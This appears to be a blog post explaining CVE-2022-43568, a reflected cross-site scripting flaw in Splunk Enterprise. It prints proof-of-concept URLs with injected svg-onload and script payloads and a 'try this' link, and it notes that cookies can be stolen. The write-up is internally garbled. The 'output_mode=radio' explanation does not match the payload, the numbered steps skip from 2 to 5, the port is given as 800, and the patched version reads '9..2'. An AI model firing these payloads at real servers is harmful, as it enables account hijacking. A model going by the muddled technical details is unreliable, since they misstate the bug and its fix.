CVE-2022-43568 - Exploiting Reflected XSS in Splunk Enterprise Using JSON and output_mode=radio

Splunk Enterprise is a popular tool used by thousands of companies worldwide to search, analyze, and visualize data. But even widely used, respected software can have security vulnerabilities. One such issue is CVE-2022-43568, a Reflected Cross Site Scripting (XSS) vulnerability discovered in certain Splunk Enterprise versions. In this exclusive post, we break down what this bug is, how it can be exploited, and what you can do to stay safe.

Impact: Execute JavaScript in the context of another Splunk user

- Official Advisory: Splunk Security Advisory SVD-2022-1102

What Exactly is This Vulnerability?

Reflected XSS bugs arise when user-supplied data is displayed by a web application without adequate sanitization or escaping. In CVE-2022-43568, the culprit is the handling of the output_mode query parameter in JSON responses. When output_mode=radio is used in requests to certain Splunk views, a maliciously crafted parameter can inject JavaScript code, which is then reflected back and executed in the victim's browser.

Why output_mode=radio Matters

Splunk provides different output_modes to control how search or view results are displayed, such as json, xml, or csv. But a non-standard value, radio, could trigger unsafe behavior, leaving the application vulnerable.

Example of the Vulnerable Request

Suppose you have Splunk running locally at http://localhost:800. A classic vulnerable endpoint could be:

GET /en-US/splunkd/__raw/services/search/jobs/export?output_mode=radio&query=something

By inserting script code into the output_mode parameter, you can cause the server to echo it back into the page.

Proof of Concept (PoC) Exploit

Here's a practical PoC that demonstrates exploitation. Let's try to get an alert in the browser (classic XSS):

http://<splunk-server>/en-US/splunkd/__raw/services/search/jobs/export?output_mode=%22%3E%3Csvg/onload=alert('Splunk XSS')%3E

When a legitimate user clicks such a link or visits a page with this exploit, the following happens

- The input %22%3E%3Csvg/onload=alert('Splunk XSS')%3E decodes to "><svg/onload=alert('Splunk XSS')>

Analyzing the Attack

// The XSS payload structure:
output_mode="><svg/onload=alert('Splunk XSS')>
// When reflected into a web page context such as:
// <input name="output_mode" value=""><svg/onload=alert('Splunk XSS')>
// The <svg> tag is interpreted by the browser and the alert pops.

2. Identify a view that echoes the output_mode parameter

- Typically, endpoints under /en-US/splunkd/__raw/services/

5. If the user is logged in and accesses the link, the script executes

- Attacker can steal cookies, impersonate the user, or perform any action available to that user in Splunk.

Try this on your own instance (replace with your Splunk server's hostname)

http://localhost:800/en-US/splunkd/__raw/services/search/jobs/export?output_mode=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Mitigation

Upgrade Immediately.

9..2 and above

Get the latest versions here:  
https://www.splunk.com/en_us/download/splunk-enterprise.html

References

- Splunk Security Advisory SVD-2022-1102
- Splunk Release Notes
- NIST NVD CVE-2022-43568

Conclusion

Even enterprise-level software like Splunk can carry dangerous web vulnerabilities like CVE-2022-43568. By understanding how improper handling of JSON in query parameters can lead to reflected XSS, and by quickly patching your systems, you can help keep your data—and your users—safe. Make patching and vigilance a habit.

If you found this post helpful, consider sharing it to keep others secure!

Timeline

Published on: 11/04/2022 23:15:00 UTC
Last modified on: 11/07/2022 20:55:00 UTC